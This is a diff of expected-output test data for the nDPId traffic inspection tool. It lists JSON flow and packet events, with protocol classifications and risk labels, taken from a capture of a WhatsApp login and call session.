+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1432582249492,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582249492,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo3x9AAEAG+U\/AqAIEEaeODcAuAbvUT3p75yrTt1AQ\/\/+B3AAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":301,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582250339,"flow_last_seen":1432582250339,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582250339,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49200,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1432582250339,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582250339,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoFBJAAEAGxF3AqAIEEaeODcAwAbsLr3wkAQ2ywFAR\/\/9P5gAA"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1432582250476,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582250476,"pkt":"APS5Jrv0xiwDYGpkCABFAAAoVmEAAO4GFA4Rp44NwKgCBAG7wDABDbLAC698JVARn\/6v5gAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1432582250618,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582250618,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAotpxAAEAGIdPAqAIEEaeODcAwAbsLr3wlAQ2ywVAQ\/\/9P5QAA"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":334,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582258587,"flow_last_seen":1432582258587,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582258587,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":51518,"dst_port":60312,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1432582258587,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582258587,"pkt":"xiwDYGpkAPS5Jrv0CABFwABIJ6AAAEARMxjAqAIEAcJav8k+65gANBimAAEAGCESpEI2xNtJG9sue8sIM0EACAAU5G1owzzn9g07DgjX0q3CWkGBWA0="} 00802{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":334,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582258587,"flow_last_seen":1432582258587,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582258587,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":51518,"dst_port":60312,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} @@ -256,79 +256,75 @@ 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":985,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1432582304464,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582304464,"pkt":"xiwDYGpkAPS5Jrv0CABFwABIRQUAAEARFbPAqAIEAcJav846yg8ANIW7AAEAGCESpEIZoNpuKgJFUxs+kVcACAAURUHG5kUyySWGpYslvS2cuO+ddv8="} 01132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1432582306376,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1432582306376,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAIS5VYAAEARDTTAqAIBwKgC\/0RcRFwB\/jsJeyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1197,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1432582324191,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582324191,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABIJmQAAEARzfDAqAIBwKgC\/+EV4RUANKgAU3BvdFVkcDCYJeGQmjjiDQABAARIlcID1NylhjSgAeWF26p2NNVFJFGe2SE="} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1198,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582331561,"flow_last_seen":1432582331561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582331561,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.39","src_port":49197,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1198,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1432582331561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582331561,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAowcFAAEAGFpTAqAIEEaeOJ8AtAbtkgHfvejCYYFAR\/\/+cbwAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1200,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1432582331698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582331698,"pkt":"APS5Jrv0xiwDYGpkCABFAAAo+xwAAO0GcDgRp44nwKgCBAG7wC16MJhgZIB38FARn\/78bwAA"} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1203,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1432582331825,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582331825,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo40dAAEAG9Q3AqAIEEaeOJ8AtAbtkgHfwejCYYVAQ\/\/6cbwAA"} -00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224235,"flow_last_seen":1432582224264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"5.178.42.26","src_port":49174,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224235,"flow_last_seen":1432582224264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"5.178.42.26","src_port":49174,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224210,"flow_last_seen":1432582224240,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.82","src_port":49173,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224210,"flow_last_seen":1432582224240,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.82","src_port":49173,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582223077,"flow_last_seen":1432582223379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.111","src_port":49163,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582223077,"flow_last_seen":1432582223379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.111","src_port":49163,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582223075,"flow_last_seen":1432582223379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.121","src_port":49166,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582223075,"flow_last_seen":1432582223379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.121","src_port":49166,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225329,"flow_last_seen":1432582225381,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.130.137.77","src_port":49176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225329,"flow_last_seen":1432582225381,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.130.137.77","src_port":49176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582224230,"flow_last_seen":1432582224260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":17,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"23.50.148.228","src_port":49172,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582224230,"flow_last_seen":1432582224260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":17,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"23.50.148.228","src_port":49172,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582227884,"flow_last_seen":1432582228167,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.14","src_port":49203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582227884,"flow_last_seen":1432582228167,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.14","src_port":49203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225324,"flow_last_seen":1432582225533,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.55","src_port":49165,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225324,"flow_last_seen":1432582225533,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.55","src_port":49165,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225313,"flow_last_seen":1432582225533,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.53","src_port":49175,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225313,"flow_last_seen":1432582225533,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.53","src_port":49175,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224208,"flow_last_seen":1432582224417,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49169,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224208,"flow_last_seen":1432582224417,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582341039,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49169,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1217,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582355253,"flow_last_seen":1432582355253,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582355253,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1217,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1432582355253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582355253,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAz7ZAAEAGVELAqAIEEa1CZsA1Abt+ckUjAAAAALAC\/\/9LOwAAAgQFtAEDAwQBAQgKLfwhgQAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1432582355393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582355393,"pkt":"APS5Jrv0xiwDYGpkCABFAAA009MAAO8G4TARrUJmwKgCBAG7wDWkxiaffnJFJIASH\/7nbQAAAgQFoAEDAwQBAQQC"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1219,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1432582355478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582355478,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoTu9AAEAG1SHAqAIEEa1CZsA1Abt+ckUkpMYmoFAQQAAIJwAA"} -00992{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1220,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582355253,"flow_last_seen":1432582355482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1432582355482,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01033{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1222,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1432582355253,"flow_last_seen":1432582355622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1432582355622,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} -00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582233314,"flow_last_seen":1432582233518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.8","src_port":49192,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 